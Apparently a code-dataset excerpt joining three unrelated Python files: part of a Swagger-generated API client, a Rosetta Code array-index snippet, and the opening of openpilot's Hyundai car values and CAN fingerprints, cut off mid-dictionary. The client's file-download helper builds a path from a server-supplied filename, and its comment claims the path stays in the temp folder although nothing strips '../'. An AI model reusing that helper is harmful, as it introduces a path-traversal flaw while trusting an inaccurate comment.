        elif isinstance(obj, self.PRIMITIVE_TYPES):
            return obj
        elif isinstance(obj, list):
            return [self.sanitize_for_serialization(sub_obj)
                    for sub_obj in obj]
        elif isinstance(obj, tuple):
            return tuple(self.sanitize_for_serialization(sub_obj)
                         for sub_obj in obj)
        elif isinstance(obj, (datetime.datetime, datetime.date)):
            return obj.isoformat()
        if isinstance(obj, dict):
            obj_dict = obj
        else:
            # Convert model obj to dict except
            # attributes `swagger_types`, `attribute_map`
            # and attributes which value is not None.
            # Convert attribute name to json key in
            # model definition for request.
            obj_dict = {obj.attribute_map[attr]: getattr(obj, attr)
                        for attr, _ in six.iteritems(obj.swagger_types)
                        if getattr(obj, attr) is not None}
        return {key: self.sanitize_for_serialization(val)
                for key, val in six.iteritems(obj_dict)}
    def deserialize(self, response, response_type):
        """Deserializes response into an object.
        :param response: RESTResponse object to be deserialized.
        :param response_type: class literal for
            deserialized object, or string of class name.
        :return: deserialized object.
        """
        # handle file downloading
        # save response body into a tmp file and return the instance
        if response_type == "file":
            return self.__deserialize_file(response)
        # fetch data from response object
        try:
            data = json.loads(response.data)
        except ValueError:
            # Non-JSON body: hand the raw data to the deserializer.
            data = response.data
        return self.__deserialize(data, response_type)
    def __deserialize(self, data, klass):
        """Deserializes dict, list, str into an object.
        :param data: dict, list or str.
        :param klass: class literal, or string of class name.
        :return: object.
        """
        if data is None:
            return None
        if type(klass) == str:
            # Container type strings like "list[Foo]" / "dict(str, Foo)" recurse
            # on the element type before any class lookup.
            if klass.startswith('list['):
                sub_kls = re.match(r'list\[(.*)\]', klass).group(1)
                return [self.__deserialize(sub_data, sub_kls)
                        for sub_data in data]
            if klass.startswith('dict('):
                sub_kls = re.match(r'dict\(([^,]*), (.*)\)', klass).group(2)
                return {k: self.__deserialize(v, sub_kls)
                        for k, v in six.iteritems(data)}
            # convert str to class
            if klass in self.NATIVE_TYPES_MAPPING:
                klass = self.NATIVE_TYPES_MAPPING[klass]
            else:
                klass = getattr(swagger_client.models, klass)
        if klass in self.PRIMITIVE_TYPES:
            return self.__deserialize_primitive(data, klass)
        elif klass == object:
            return self.__deserialize_object(data)
        elif klass == datetime.date:
            return self.__deserialize_date(data)
        elif klass == datetime.datetime:
            return self.__deserialize_datatime(data)
        else:
            return self.__deserialize_model(data, klass)
    def call_api(self, resource_path, method,
                 path_params=None, query_params=None, header_params=None,
                 body=None, post_params=None, files=None,
                 response_type=None, auth_settings=None, async_req=None,
                 _return_http_data_only=None, collection_formats=None,
                 _preload_content=True, _request_timeout=None):
        """Makes the HTTP request (synchronous) and returns deserialized data.
        To make an async request, set the async_req parameter.
        :param resource_path: Path to method endpoint.
        :param method: Method to call.
        :param path_params: Path parameters in the url.
        :param query_params: Query parameters in the url.
        :param header_params: Header parameters to be
            placed in the request header.
        :param body: Request body.
        :param post_params dict: Request post form parameters,
            for `application/x-www-form-urlencoded`, `multipart/form-data`.
        :param auth_settings list: Auth Settings names for the request.
        :param response: Response data type.
        :param files dict: key -> filename, value -> filepath,
            for `multipart/form-data`.
        :param async_req bool: execute request asynchronously
        :param _return_http_data_only: response data without head status code
                                       and headers
        :param collection_formats: dict of collection formats for path, query,
            header, and post parameters.
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return:
            If async_req parameter is True,
            the request will be called asynchronously.
            The method will return the request thread.
            If parameter async_req is False or missing,
            then the method will return the response directly.
        """
        if not async_req:
            return self.__call_api(resource_path, method,
                                   path_params, query_params, header_params,
                                   body, post_params, files,
                                   response_type, auth_settings,
                                   _return_http_data_only, collection_formats,
                                   _preload_content, _request_timeout)
        else:
            thread = self.pool.apply_async(self.__call_api, (resource_path,
                                           method, path_params, query_params,
                                           header_params, body,
                                           post_params, files,
                                           response_type, auth_settings,
                                           _return_http_data_only,
                                           collection_formats,
                                           _preload_content, _request_timeout))
        return thread
    def request(self, method, url, query_params=None, headers=None,
                post_params=None, body=None, _preload_content=True,
                _request_timeout=None):
        """Makes the HTTP request using RESTClient."""
        if method == "GET":
            return self.rest_client.GET(url,
                                        query_params=query_params,
                                        _preload_content=_preload_content,
                                        _request_timeout=_request_timeout,
                                        headers=headers)
        elif method == "HEAD":
            return self.rest_client.HEAD(url,
                                         query_params=query_params,
                                         _preload_content=_preload_content,
                                         _request_timeout=_request_timeout,
                                         headers=headers)
        elif method == "OPTIONS":
            return self.rest_client.OPTIONS(url,
                                            query_params=query_params,
                                            headers=headers,
                                            post_params=post_params,
                                            _preload_content=_preload_content,
                                            _request_timeout=_request_timeout,
                                            body=body)
        elif method == "POST":
            return self.rest_client.POST(url,
                                         query_params=query_params,
                                         headers=headers,
                                         post_params=post_params,
                                         _preload_content=_preload_content,
                                         _request_timeout=_request_timeout,
                                         body=body)
        elif method == "PUT":
            return self.rest_client.PUT(url,
                                        query_params=query_params,
                                        headers=headers,
                                        post_params=post_params,
                                        _preload_content=_preload_content,
                                        _request_timeout=_request_timeout,
                                        body=body)
        elif method == "PATCH":
            return self.rest_client.PATCH(url,
                                          query_params=query_params,
                                          headers=headers,
                                          post_params=post_params,
                                          _preload_content=_preload_content,
                                          _request_timeout=_request_timeout,
                                          body=body)
        elif method == "DELETE":
            return self.rest_client.DELETE(url,
                                           query_params=query_params,
                                           headers=headers,
                                           _preload_content=_preload_content,
                                           _request_timeout=_request_timeout,
                                           body=body)
        else:
            raise ValueError(
                "http method must be `GET`, `HEAD`, `OPTIONS`,"
                " `POST`, `PATCH`, `PUT` or `DELETE`."
            )
    def parameters_to_tuples(self, params, collection_formats):
        """Get parameters as list of tuples, formatting collections.
        :param params: Parameters as dict or list of two-tuples
        :param dict collection_formats: Parameter collection formats
        :return: Parameters as list of tuples, collections formatted
        """
        new_params = []
        if collection_formats is None:
            collection_formats = {}
        for k, v in six.iteritems(params) if isinstance(params, dict) else params:  # noqa: E501
            if k in collection_formats:
                collection_format = collection_formats[k]
                if collection_format == 'multi':
                    # 'multi': repeat the key once per value.
                    new_params.extend((k, value) for value in v)
                else:
                    if collection_format == 'ssv':
                        delimiter = ' '
                    elif collection_format == 'tsv':
                        delimiter = '\t'
                    elif collection_format == 'pipes':
                        delimiter = '|'
                    else:  # csv is the default
                        delimiter = ','
                    new_params.append(
                        (k, delimiter.join(str(value) for value in v)))
            else:
                new_params.append((k, v))
        return new_params
    def prepare_post_parameters(self, post_params=None, files=None):
        """Builds form parameters.
        :param post_params: Normal form parameters.
        :param files: File parameters.
        :return: Form parameters with files.
        """
        params = []
        if post_params:
            params = post_params
        if files:
            for k, v in six.iteritems(files):
                if not v:
                    continue
                file_names = v if type(v) is list else [v]
                for n in file_names:
                    with open(n, 'rb') as f:
                        filename = os.path.basename(f.name)
                        filedata = f.read()
                        mimetype = (mimetypes.guess_type(filename)[0] or
                                    'application/octet-stream')
                        params.append(
                            tuple([k, tuple([filename, filedata, mimetype])]))
        return params
    def select_header_accept(self, accepts):
        """Returns `Accept` based on an array of accepts provided.
        :param accepts: List of headers.
        :return: Accept (e.g. application/json).
        """
        if not accepts:
            return
        accepts = [x.lower() for x in accepts]
        if 'application/json' in accepts:
            return 'application/json'
        else:
            return ', '.join(accepts)
    def select_header_content_type(self, content_types):
        """Returns `Content-Type` based on an array of content_types provided.
        :param content_types: List of content-types.
        :return: Content-Type (e.g. application/json).
        """
        if not content_types:
            return 'application/json'
        content_types = [x.lower() for x in content_types]
        if 'application/json' in content_types or '*/*' in content_types:
            return 'application/json'
        else:
            return content_types[0]
    def update_params_for_auth(self, headers, querys, auth_settings):
        """Updates header and query params based on authentication setting.
        :param headers: Header parameters dict to be updated.
        :param querys: Query parameters tuple list to be updated.
        :param auth_settings: Authentication setting identifiers list.
        """
        if not auth_settings:
            return
        for auth in auth_settings:
            auth_setting = self.configuration.auth_settings().get(auth)
            if auth_setting:
                if not auth_setting['value']:
                    continue
                elif auth_setting['in'] == 'header':
                    headers[auth_setting['key']] = auth_setting['value']
                elif auth_setting['in'] == 'query':
                    querys.append((auth_setting['key'], auth_setting['value']))
                else:
                    raise ValueError(
                        'Authentication token must be in `query` or `header`'
                    )
    def __deserialize_file(self, response):
        """Deserializes body to file
        Saves response body into a file in a temporary folder,
        using the filename from the `Content-Disposition` header if provided.
        :param response: RESTResponse.
        :return: file path.
        """
        fd, path = tempfile.mkstemp(dir=self.configuration.temp_folder_path)
        os.close(fd)
        os.remove(path)
        content_disposition = response.getheader("Content-Disposition")
        if content_disposition:
            # Prefer the server-supplied filename, kept inside the tmp dir.
            filename = re.search(r'filename=[\'"]?([^\'"\s]+)[\'"]?',
                                 content_disposition).group(1)
            path = os.path.join(os.path.dirname(path), filename)
        with open(path, "w") as f:
            f.write(response.data)
        return path
    def __deserialize_primitive(self, data, klass):
        """Deserializes string to primitive type.
        :param data: str.
        :param klass: class literal.
        :return: int, long, float, str, bool.
        """
        try:
            return klass(data)
        except UnicodeEncodeError:
            return six.text_type(data)
        except TypeError:
            return data
    def __deserialize_object(self, value):
        """Return a original value.
        :return: object.
        """
        return value
    def __deserialize_date(self, string):
        """Deserializes string to date.
        :param string: str.
        :return: date.
        """
        try:
            from dateutil.parser import parse
            return parse(string).date()
        except ImportError:
            # Without python-dateutil the raw string is returned unchanged.
            return string
        except ValueError:
            raise rest.ApiException(
                status=0,
                reason="Failed to parse `{0}` as date object".format(string)
            )
    def __deserialize_datatime(self, string):
        """Deserializes string to datetime.
        The string should be in iso8601 datetime format.
        :param string: str.
        :return: datetime.
        """
        try:
            from dateutil.parser import parse
            return parse(string)
        except ImportError:
            # Without python-dateutil the raw string is returned unchanged.
            return string
        except ValueError:
            raise rest.ApiException(
                status=0,
                reason=(
                    "Failed to parse `{0}` as datetime object"
                    .format(string)
                )
            )
    def __hasattr(self, object, name):
        # Looks only at the class's own __dict__, so inherited members don't count.
        return name in object.__class__.__dict__
    def __deserialize_model(self, data, klass):
        """Deserializes list or dict to model.
        :param data: dict, list.
        :param klass: class literal.
        :return: model object.
        """
        if (not klass.swagger_types and
                not self.__hasattr(klass, 'get_real_child_model')):
            return data
        kwargs = {}
        if klass.swagger_types is not None:
            for attr, attr_type in six.iteritems(klass.swagger_types):
                if (data is not None and
                        klass.attribute_map[attr] in data and
                        isinstance(data, (list, dict))):
                    value = data[klass.attribute_map[attr]]
                    kwargs[attr] = self.__deserialize(value, attr_type)
        instance = klass(**kwargs)
        if (isinstance(instance, dict) and
                klass.swagger_types is not None and
                isinstance(data, dict)):
            # Keep extra keys that are not part of the declared model.
            for key, value in data.items():
                if key not in klass.swagger_types:
                    instance[key] = value
        if self.__hasattr(instance, 'get_real_child_model'):
            # Polymorphic model: re-deserialize as the discriminated subclass.
            klass_name = instance.get_real_child_model(data)
            if klass_name:
                instance = self.__deserialize(data, klass_name)
        return instance
| 39.165625 | 96 | 0.55314 |
dad80a46ce791f2a5b2f7adb530c30dd9d35aa0d | 159 | py | Python | Task/Arrays/Python/arrays-7.py | LaudateCorpus1/RosettaCodeData | 9ad63ea473a958506c041077f1d810c0c7c8c18d | [
"Info-ZIP"
] | 5 | 2021-01-29T20:08:05.000Z | 2022-03-22T06:16:05.000Z | Task/Arrays/Python/arrays-7.py | seanwallawalla-forks/RosettaCodeData | 9ad63ea473a958506c041077f1d810c0c7c8c18d | [
"Info-ZIP"
] | null | null | null | Task/Arrays/Python/arrays-7.py | seanwallawalla-forks/RosettaCodeData | 9ad63ea473a958506c041077f1d810c0c7c8c18d | [
"Info-ZIP"
] | 1 | 2021-04-13T04:19:31.000Z | 2021-04-13T04:19:31.000Z | try:
    # len(array) is one past the last valid index, so this raises IndexError
    # (Python 2 print-statement syntax throughout).
    print array[len(array)]
except IndexError as e:
    # Print the caught exception object.
    print e
| 22.714286 | 62 | 0.679245 |
1dd0467f48317bf34b2103e7bd3c8b97a95aaa9f | 35,989 | py | Python | selfdrive/car/hyundai/values.py | stealthzerocool/openpilot | 6e9576df4a7af61b9cff7daabda6709cddd63253 | [
"MIT"
] | 2 | 2021-04-09T00:12:01.000Z | 2021-05-03T07:55:43.000Z | selfdrive/car/hyundai/values.py | stealthzerocool/openpilot | 6e9576df4a7af61b9cff7daabda6709cddd63253 | [
"MIT"
] | null | null | null | selfdrive/car/hyundai/values.py | stealthzerocool/openpilot | 6e9576df4a7af61b9cff7daabda6709cddd63253 | [
"MIT"
] | 1 | 2021-04-13T08:33:40.000Z | 2021-04-13T08:33:40.000Z | # flake8: noqa
from cereal import car
from selfdrive.car import dbc_dict
# Convenience alias for the ECU enum defined in the capnp car schema.
Ecu = car.CarParams.Ecu
# Steer torque limits
class CarControllerParams:
  """Steering torque limits selected per-platform from the fingerprint on CP."""
  def __init__(self, CP):
    # Platforms below accept a larger max steer command than the default 255.
    # Tuple (not list) membership: no per-call allocation of a mutable list and
    # clearer fixed-collection intent.  CAR is defined later in this module, so
    # the lookup must stay here, evaluated at call time.
    if CP.carFingerprint in (CAR.SONATA, CAR.PALISADE, CAR.SANTA_FE, CAR.VELOSTER, CAR.GENESIS_G70, CAR.IONIQ_EV_2020):
      self.STEER_MAX = 384
    else:
      self.STEER_MAX = 255
    # NOTE(review): these look like per-frame torque ramp limits and
    # driver-override thresholds -- confirm units against the car controller.
    self.STEER_DELTA_UP = 3
    self.STEER_DELTA_DOWN = 7
    self.STEER_DRIVER_ALLOWANCE = 50
    self.STEER_DRIVER_MULTIPLIER = 2
    self.STEER_DRIVER_FACTOR = 1
class CAR:
  """Platform identifier strings for supported Hyundai, Kia and Genesis models."""
  # Hyundai
  ELANTRA = "HYUNDAI ELANTRA LIMITED ULTIMATE 2017"
  ELANTRA_GT_I30 = "HYUNDAI I30 N LINE 2019 & GT 2018 DCT"
  HYUNDAI_GENESIS = "HYUNDAI GENESIS 2015-2016"
  IONIQ = "HYUNDAI IONIQ HYBRID 2017-2019"
  IONIQ_EV_LTD = "HYUNDAI IONIQ ELECTRIC LIMITED 2019"
  IONIQ_EV_2020 = "HYUNDAI IONIQ ELECTRIC 2020"
  KONA = "HYUNDAI KONA 2020"
  KONA_EV = "HYUNDAI KONA ELECTRIC 2019"
  SANTA_FE = "HYUNDAI SANTA FE LIMITED 2019"
  SONATA = "HYUNDAI SONATA 2020"
  SONATA_LF = "HYUNDAI SONATA 2019"
  PALISADE = "HYUNDAI PALISADE 2020"
  VELOSTER = "HYUNDAI VELOSTER 2019"
  # Kia
  KIA_FORTE = "KIA FORTE E 2018 & GT 2021"
  KIA_NIRO_EV = "KIA NIRO EV 2020"
  KIA_OPTIMA = "KIA OPTIMA SX 2019 & 2016"
  KIA_OPTIMA_H = "KIA OPTIMA HYBRID 2017 & SPORTS 2019"
  KIA_SORENTO = "KIA SORENTO GT LINE 2018"
  KIA_STINGER = "KIA STINGER GT2 2018"
  # Genesis
  GENESIS_G70 = "GENESIS G70 2018"
  GENESIS_G80 = "GENESIS G80 2017"
  GENESIS_G90 = "GENESIS G90 2017"
class Buttons:
NONE = 0
RES_ACCEL = 1
SET_DECEL = 2
CANCEL = 4
FINGERPRINTS = {
CAR.ELANTRA: [{
66: 8, 67: 8, 68: 8, 127: 8, 273: 8, 274: 8, 275: 8, 339: 8, 356: 4, 399: 8, 512: 6, 544: 8, 593: 8, 608: 8, 688: 5, 790: 8, 809: 8, 897: 8, 832: 8, 899: 8, 902: 8, 903: 8, 905: 8, 909: 8, 916: 8, 1040: 8, 1056: 8, 1057: 8, 1078: 4, 1170: 8, 1265: 4, 1280: 1, 1282: 4, 1287: 4, 1290: 8, 1292: 8, 1294: 8, 1312: 8, 1314: 8, 1322: 8, 1345: 8, 1349: 8, 1351: 8, 1353: 8, 1363: 8, 1366: 8, 1367: 8, 1369: 8, 1407: 8, 1415: 8, 1419: 8, 1425: 2, 1427: 6, 1440: 8, 1456: 4, 1472: 8, 1486: 8, 1487: 8, 1491: 8, 1530: 8, 1532: 5, 2001: 8, 2003: 8, 2004: 8, 2009: 8, 2012: 8, 2016: 8, 2017: 8, 2024: 8, 2025: 8
}],
CAR.ELANTRA_GT_I30: [{
66: 8, 67: 8, 68: 8, 127: 8, 128: 8, 129: 8, 273: 8, 274: 8, 275: 8, 339: 8, 354: 3, 356: 4, 399: 8, 512: 6, 544: 8, 593: 8, 608: 8, 688: 5, 790: 8, 809: 8, 884: 8, 897: 8, 899: 8, 902: 8, 903: 8, 905: 8, 909: 8, 916: 8, 1040: 8, 1056: 8, 1057: 8, 1078: 4, 1151: 6, 1168: 7, 1170: 8, 1193: 8, 1265: 4, 1280: 1, 1282: 4, 1287: 4, 1290: 8, 1292: 8, 1294: 8, 1312: 8, 1322: 8, 1345: 8, 1348: 8, 1349: 8, 1351: 8, 1353: 8, 1356: 8, 1363: 8, 1365: 8, 1366: 8, 1367: 8, 1369: 8, 1407: 8, 1414: 3, 1415: 8, 1427: 6, 1440: 8, 1456: 4, 1470: 8, 1486: 8, 1487: 8, 1491: 8, 1530: 8, 1952: 8, 1960: 8, 1988: 8, 2000: 8, 2001: 8, 2005: 8, 2008: 8, 2009: 8, 2013: 8, 2017: 8, 2025: 8
},
{
66: 8, 67: 8, 68: 8, 127: 8, 128: 8, 129: 8, 273: 8, 274: 8, 275: 8, 339: 8, 354: 3, 356: 4, 399: 8, 512: 6, 544: 8, 593: 8, 608: 8, 688: 5, 790: 8, 809: 8, 832: 8, 897: 8, 899: 8, 902: 8, 903: 8, 905: 8, 909: 8, 916: 8, 1040: 8, 1056: 8, 1057: 8, 1078: 4, 1151: 6, 1168: 7, 1170: 8, 1265: 4, 1280: 1, 1282: 4, 1287: 4, 1290: 8, 1292: 8, 1294: 8, 1312: 8, 1322: 8, 1342: 6, 1345: 8, 1348: 8, 1349: 8, 1351: 8, 1353: 8, 1356: 8, 1363: 8, 1366: 8, 1367: 8, 1369: 8, 1407: 8, 1414: 3, 1415: 8, 1419: 8, 1440: 8, 1456: 4, 1470: 8, 1486: 8, 1487: 8, 1491: 8, 1530: 8
},
{
66: 8, 67: 8, 68: 8, 127: 8, 128: 8, 129: 8, 273: 8, 274: 8, 275: 8, 339: 8, 354: 3, 356: 4, 399: 8, 512: 6, 544: 8, 593: 8, 608: 8, 688: 5, 790: 8, 809: 8, 832: 8, 897: 8, 899: 8, 902: 8, 903: 8, 905: 8, 909: 8, 916: 8, 1040: 8, 1056: 8, 1057: 8, 1078: 4, 1151: 6, 1168: 7, 1170: 8, 1265: 4, 1280: 1, 1282: 4, 1287: 4, 1290: 8, 1292: 8, 1294: 8, 1312: 8, 1322: 8, 1342: 6, 1345: 8, 1348: 8, 1349: 8, 1351: 8, 1353: 8, 1356: 8, 1363: 8, 1366: 8, 1367: 8, 1369: 8, 1407: 8, 1414: 3, 1419: 8, 1427: 6, 1440: 8, 1456: 4, 1470: 8, 1486: 8, 1487: 8, 1491: 8, 1960: 8, 1990: 8, 1998: 8, 2000: 8, 2001: 8, 2004: 8, 2005: 8, 2008: 8, 2009: 8, 2012: 8, 2013: 8, 2015: 8, 2016: 8, 2017: 8, 2024: 8, 2025: 8
}],
CAR.HYUNDAI_GENESIS: [{
67: 8, 68: 8, 304: 8, 320: 8, 339: 8, 356: 4, 544: 7, 593: 8, 608: 8, 688: 5, 809: 8, 832: 8, 854: 7, 870: 7, 871: 8, 872: 5, 897: 8, 902: 8, 903: 6, 916: 8, 1024: 2, 1040: 8, 1056: 8, 1057: 8, 1078: 4, 1107: 5, 1136: 8, 1151: 6, 1168: 7, 1170: 8, 1173: 8, 1184: 8, 1265: 4, 1280: 1, 1287: 4, 1292: 8, 1312: 8, 1322: 8, 1331: 8, 1332: 8, 1333: 8, 1334: 8, 1335: 8, 1342: 6, 1345: 8, 1363: 8, 1369: 8, 1370: 8, 1371: 8, 1378: 4, 1384: 5, 1407: 8, 1419: 8, 1427: 6, 1434: 2, 1456: 4
},
{
67: 8, 68: 8, 304: 8, 320: 8, 339: 8, 356: 4, 544: 7, 593: 8, 608: 8, 688: 5, 809: 8, 832: 8, 854: 7, 870: 7, 871: 8, 872: 5, 897: 8, 902: 8, 903: 6, 916: 8, 1024: 2, 1040: 8, 1056: 8, 1057: 8, 1078: 4, 1107: 5, 1136: 8, 1151: 6, 1168: 7, 1170: 8, 1173: 8, 1184: 8, 1265: 4, 1280: 1, 1281: 3, 1287: 4, 1292: 8, 1312: 8, 1322: 8, 1331: 8, 1332: 8, 1333: 8, 1334: 8, 1335: 8, 1345: 8, 1363: 8, 1369: 8, 1370: 8, 1378: 4, 1379: 8, 1384: 5, 1407: 8, 1419: 8, 1427: 6, 1434: 2, 1456: 4
},
{
67: 8, 68: 8, 304: 8, 320: 8, 339: 8, 356: 4, 544: 7, 593: 8, 608: 8, 688: 5, 809: 8, 854: 7, 870: 7, 871: 8, 872: 5, 897: 8, 902: 8, 903: 6, 912: 7, 916: 8, 1040: 8, 1056: 8, 1057: 8, 1078: 4, 1107: 5, 1136: 8, 1151: 6, 1168: 7, 1170: 8, 1173: 8, 1184: 8, 1265: 4, 1268: 8, 1280: 1, 1281: 3, 1287: 4, 1292: 8, 1312: 8, 1322: 8, 1331: 8, 1332: 8, 1333: 8, 1334: 8, 1335: 8, 1345: 8, 1363: 8, 1369: 8, 1370: 8, 1371: 8, 1378: 4, 1384: 5, 1407: 8, 1419: 8, 1427: 6, 1434: 2, 1437: 8, 1456: 4
},
{
67: 8, 68: 8, 304: 8, 320: 8, 339: 8, 356: 4, 544: 7, 593: 8, 608: 8, 688: 5, 809: 8, 832: 8, 854: 7, 870: 7, 871: 8, 872: 5, 897: 8, 902: 8, 903: 6, 916: 8, 1040: 8, 1056: 8, 1057: 8, 1078: 4, 1107: 5, 1136: 8, 1151: 6, 1168: 7, 1170: 8, 1173: 8, 1184: 8, 1265: 4, 1280: 1, 1287: 4, 1292: 8, 1312: 8, 1322: 8, 1331: 8, 1332: 8, 1333: 8, 1334: 8, 1335: 8, 1345: 8, 1363: 8, 1369: 8, 1370: 8, 1378: 4, 1379: 8, 1384: 5, 1407: 8, 1425: 2, 1427: 6, 1437: 8, 1456: 4
},
{
67: 8, 68: 8, 304: 8, 320: 8, 339: 8, 356: 4, 544: 7, 593: 8, 608: 8, 688: 5, 809: 8, 832: 8, 854: 7, 870: 7, 871: 8, 872: 5, 897: 8, 902: 8, 903: 6, 916: 8, 1040: 8, 1056: 8, 1057: 8, 1078: 4, 1107: 5, 1136: 8, 1151: 6, 1168: 7, 1170: 8, 1173: 8, 1184: 8, 1265: 4, 1280: 1, 1287: 4, 1292: 8, 1312: 8, 1322: 8, 1331: 8, 1332: 8, 1333: 8, 1334: 8, 1335: 8, 1345: 8, 1363: 8, 1369: 8, 1370: 8, 1371: 8, 1378: 4, 1384: 5, 1407: 8, 1419: 8, 1425: 2, 1427: 6, 1437: 8, 1456: 4
}],
CAR.SANTA_FE: [{
67: 8, 127: 8, 304: 8, 320: 8, 339: 8, 356: 4, 544: 8, 593: 8, 608: 8, 688: 6, 809: 8, 832: 8, 854: 7, 870: 7, 871: 8, 872: 8, 897: 8, 902: 8, 903: 8, 905: 8, 909: 8, 916: 8, 1040: 8, 1042: 8, 1056: 8, 1057: 8, 1078: 4, 1107: 5, 1136: 8, 1151: 6, 1155: 8, 1156: 8, 1162: 8, 1164: 8, 1168: 7, 1170: 8, 1173: 8, 1183: 8, 1186: 2, 1191: 2, 1227: 8, 1265: 4, 1280: 1, 1287: 4, 1290: 8, 1292: 8, 1294: 8, 1312: 8, 1322: 8, 1342: 6, 1345: 8, 1348: 8, 1363: 8, 1369: 8, 1379: 8, 1384: 8, 1407: 8, 1414: 3, 1419: 8, 1427: 6, 1456: 4, 1470: 8
},
{
67: 8, 127: 8, 304: 8, 320: 8, 339: 8, 356: 4, 544: 8, 593: 8, 608: 8, 688: 6, 764: 8, 809: 8, 854: 7, 870: 7, 871: 8, 872: 8, 897: 8, 902: 8, 903: 8, 905: 8, 909: 8, 916: 8, 1040: 8, 1042: 8, 1056: 8, 1057: 8, 1064: 8, 1078: 4, 1107: 5, 1136: 8, 1151: 6, 1155: 8, 1162: 8, 1164: 8, 1168: 7, 1170: 8, 1173: 8, 1180: 8, 1183: 8, 1186: 2, 1227: 8, 1265: 4, 1280: 1, 1287: 4, 1290: 8, 1292: 8, 1294: 8, 1312: 8, 1322: 8, 1345: 8, 1348: 8, 1363: 8, 1369: 8, 1371: 8, 1378: 8, 1384: 8, 1407: 8, 1414: 3, 1419: 8, 1427: 6, 1456: 4, 1470: 8, 1988: 8, 2000: 8, 2004: 8, 2008: 8, 2012: 8
},
{
67: 8, 68: 8, 80: 4, 160: 8, 161: 8, 272: 8, 288: 4, 339: 8, 356: 8, 357: 8, 399: 8, 544: 8, 608: 8, 672: 8, 688: 5, 704: 1, 790: 8, 809: 8, 848: 8, 880: 8, 898: 8, 900: 8, 901: 8, 904: 8, 1056: 8, 1064: 8, 1065: 8, 1072: 8, 1075: 8, 1087: 8, 1088: 8, 1151: 8, 1200: 8, 1201: 8, 1232: 4, 1264: 8, 1265: 8, 1266: 8, 1296: 8, 1306: 8, 1312: 8, 1322: 8, 1331: 8, 1332: 8, 1333: 8, 1348: 8, 1349: 8, 1369: 8, 1370: 8, 1371: 8, 1407: 8, 1415: 8, 1419: 8, 1440: 8, 1442: 4, 1461: 8, 1470: 8
}],
CAR.SONATA: [
{67: 8, 68: 8, 127: 8, 304: 8, 320: 8, 339: 8, 356: 4, 544: 8, 546: 8, 549: 8, 550: 8, 576: 8, 593: 8, 608: 8, 688: 6, 809: 8, 832: 8, 854: 8, 865: 8, 870: 7, 871: 8, 872: 8, 897: 8, 902: 8, 903: 8, 905: 8, 908: 8, 909: 8, 912: 7, 913: 8, 916: 8, 1040: 8, 1042: 8, 1056: 8, 1057: 8, 1078: 4, 1089: 5, 1096: 8, 1107: 5, 1108: 8, 1114: 8, 1136: 8, 1145: 8, 1151: 8, 1155: 8, 1156: 8, 1157: 4, 1162: 8, 1164: 8, 1168: 8, 1170: 8, 1173: 8, 1180: 8, 1183: 8, 1184: 8, 1186: 2, 1191: 2, 1193: 8, 1210: 8, 1225: 8, 1227: 8, 1265: 4, 1268: 8, 1280: 8, 1287: 4, 1290: 8, 1292: 8, 1294: 8, 1312: 8, 1322: 8, 1330: 8, 1339: 8, 1342: 6, 1343: 8, 1345: 8, 1348: 8, 1363: 8, 1369: 8, 1371: 8, 1378: 8, 1379: 8, 1384: 8, 1394: 8, 1407: 8, 1419: 8, 1427: 6, 1446: 8, 1456: 4, 1460: 8, 1470: 8, 1485: 8, 1504: 3, 1988: 8, 1996: 8, 2000: 8, 2004: 8, 2008: 8, 2012: 8, 2015: 8},
],
CAR.SONATA_LF: [
{66: 8, 67: 8, 68: 8, 127: 8, 273: 8, 274: 8, 275: 8, 339: 8, 356: 4, 399: 8, 447: 8, 512: 6, 544: 8, 593: 8, 608: 8, 688: 5, 790: 8, 809: 8, 832: 8, 884: 8, 897: 8, 899: 8, 902: 8, 903: 6, 916: 8, 1040: 8, 1056: 8, 1057: 8, 1078: 4, 1151: 6, 1168: 7, 1170: 8, 1253: 8, 1254: 8, 1255: 8, 1265: 4, 1280: 1, 1287: 4, 1290: 8, 1292: 8, 1294: 8, 1312: 8, 1314: 8, 1322: 8, 1331: 8, 1332: 8, 1333: 8, 1342: 6, 1345: 8, 1348: 8, 1349: 8, 1351: 8, 1353: 8, 1363: 8, 1365: 8, 1366: 8, 1367: 8, 1369: 8, 1397: 8, 1407: 8, 1415: 8, 1419: 8, 1425: 2, 1427: 6, 1440: 8, 1456: 4, 1470: 8, 1472: 8, 1486: 8, 1487: 8, 1491: 8, 1530: 8, 1532: 5, 2000: 8, 2001: 8, 2004: 8, 2005: 8, 2008: 8, 2009: 8, 2012: 8, 2013: 8, 2014: 8, 2016: 8, 2017: 8, 2024: 8, 2025: 8},
],
CAR.KIA_OPTIMA: [{
64: 8, 66: 8, 67: 8, 68: 8, 127: 8, 128: 8, 129: 8, 273: 8, 274: 8, 275: 8, 339: 8, 354: 3, 356: 4, 399: 8, 447: 8, 512: 6, 544: 8, 558: 8, 593: 8, 608: 8, 640: 8, 688: 5, 790: 8, 809: 8, 832: 8, 884: 8, 897: 8, 899: 8, 902: 8, 903: 6, 909: 8, 912: 7, 916: 8, 1040: 8, 1056: 8, 1057: 8, 1078: 4, 1151: 6, 1168: 7, 1170: 8, 1186: 2, 1191: 2, 1253: 8, 1254: 8, 1255: 8, 1265: 4, 1268: 8, 1280: 1, 1282: 4, 1287: 4, 1290: 8, 1292: 8, 1294: 8, 1312: 8, 1322: 8, 1331: 8, 1332: 8, 1333: 8, 1342: 6, 1345: 8, 1348: 8, 1349: 8, 1351: 8, 1353: 8, 1356: 8, 1363: 8, 1365: 8, 1366: 8, 1367: 8, 1369: 8, 1407: 8, 1414: 3, 1415: 8, 1419: 8, 1425: 2, 1427: 6, 1440: 8, 1456: 4, 1470: 8, 1472: 8, 1486: 8, 1487: 8, 1491: 8, 1492: 8, 1530: 8, 1532: 5, 1792: 8, 1872: 8, 1937: 8, 1953: 8, 1968: 8, 1988: 8, 1996: 8, 2000: 8, 2001: 8, 2004: 8, 2008: 8, 2009: 8, 2012: 8, 2015: 8, 2016: 8, 2017: 8, 2024: 8, 2025: 8, 1371: 8, 1397: 8, 1961: 8
}],
CAR.KIA_SORENTO: [{
